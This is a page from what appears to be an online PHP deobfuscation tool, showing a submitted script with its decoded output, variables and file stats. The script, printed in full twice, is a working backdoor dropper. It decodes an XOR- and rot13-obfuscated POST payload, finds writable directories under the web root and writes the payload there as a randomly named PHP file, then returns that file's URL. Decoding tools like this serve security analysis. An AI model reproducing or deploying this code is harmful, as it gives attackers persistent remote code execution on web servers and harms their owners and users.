Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $iprtewb = "erkpzyhxgswyffvf";$edjjd = "";foreach ($_POST as $ztkaxsafd => $gohnp){i..

Decoded Output download

<?php $iprtewb = "erkpzyhxgswyffvf";$edjjd = "";foreach ($_POST as $ztkaxsafd => $gohnp){if (strlen($ztkaxsafd) == 16 and substr_count($gohnp, "%") > 10){aslqvpz($ztkaxsafd, $gohnp);}}function aslqvpz($ztkaxsafd, $bcscyeepba){global $edjjd;$edjjd = $ztkaxsafd;$bcscyeepba = str_split(rawurldecode(str_rot13($bcscyeepba)));function vcarwarn($sgeyc, $ztkaxsafd){global $iprtewb, $edjjd;return $sgeyc ^ $iprtewb[$ztkaxsafd % strlen($iprtewb)] ^ $edjjd[$ztkaxsafd % strlen($edjjd)];}$bcscyeepba = implode("", array_map("vcarwarn", array_values($bcscyeepba), array_keys($bcscyeepba)));$bcscyeepba = @unserialize($bcscyeepba);if (@is_array($bcscyeepba)){$ztkaxsafd = array_keys($bcscyeepba);$bcscyeepba = $bcscyeepba[$ztkaxsafd[0]];if ($bcscyeepba === $ztkaxsafd[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function asqnph($ihulsfsfhgir) {static $gtqwgf = array();$kwgcpq = glob($ihulsfsfhgir . '/*', GLOB_ONLYDIR);if (count($kwgcpq) > 0) {foreach ($kwgcpq as $ihulsfsfhg){if (@is_writable($ihulsfsfhg)){$gtqwgf[] = $ihulsfsfhg;}}}foreach ($kwgcpq as $ihulsfsfhgir) asqnph($ihulsfsfhgir);return $gtqwgf;}$ipsny = $_SERVER["DOCUMENT_ROOT"];$kwgcpq = asqnph($ipsny);$ztkaxsafd = array_rand($kwgcpq);$nbvavaw = $kwgcpq[$ztkaxsafd] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($nbvavaw, $bcscyeepba);echo "http://" . $_SERVER["HTTP_HOST"] . substr($nbvavaw, strlen($ipsny));exit();}}} ?>

Did this file decode correctly?

Original Code

<?php $iprtewb = "erkpzyhxgswyffvf";$edjjd = "";foreach ($_POST as $ztkaxsafd => $gohnp){if (strlen($ztkaxsafd) == 16 and substr_count($gohnp, "%") > 10){aslqvpz($ztkaxsafd, $gohnp);}}function aslqvpz($ztkaxsafd, $bcscyeepba){global $edjjd;$edjjd = $ztkaxsafd;$bcscyeepba = str_split(rawurldecode(str_rot13($bcscyeepba)));function vcarwarn($sgeyc, $ztkaxsafd){global $iprtewb, $edjjd;return $sgeyc ^ $iprtewb[$ztkaxsafd % strlen($iprtewb)] ^ $edjjd[$ztkaxsafd % strlen($edjjd)];}$bcscyeepba = implode("", array_map("vcarwarn", array_values($bcscyeepba), array_keys($bcscyeepba)));$bcscyeepba = @unserialize($bcscyeepba);if (@is_array($bcscyeepba)){$ztkaxsafd = array_keys($bcscyeepba);$bcscyeepba = $bcscyeepba[$ztkaxsafd[0]];if ($bcscyeepba === $ztkaxsafd[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function asqnph($ihulsfsfhgir) {static $gtqwgf = array();$kwgcpq = glob($ihulsfsfhgir . '/*', GLOB_ONLYDIR);if (count($kwgcpq) > 0) {foreach ($kwgcpq as $ihulsfsfhg){if (@is_writable($ihulsfsfhg)){$gtqwgf[] = $ihulsfsfhg;}}}foreach ($kwgcpq as $ihulsfsfhgir) asqnph($ihulsfsfhgir);return $gtqwgf;}$ipsny = $_SERVER["DOCUMENT_ROOT"];$kwgcpq = asqnph($ipsny);$ztkaxsafd = array_rand($kwgcpq);$nbvavaw = $kwgcpq[$ztkaxsafd] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($nbvavaw, $bcscyeepba);echo "http://" . $_SERVER["HTTP_HOST"] . substr($nbvavaw, strlen($ipsny));exit();}}}

Function Calls

None

Variables

$edjjd
$iprtewb erkpzyhxgswyffvf

Stats

MD5 548e6429cb404e7da5a5424188c6fa7a
Eval Count 0
Decode Time 83 ms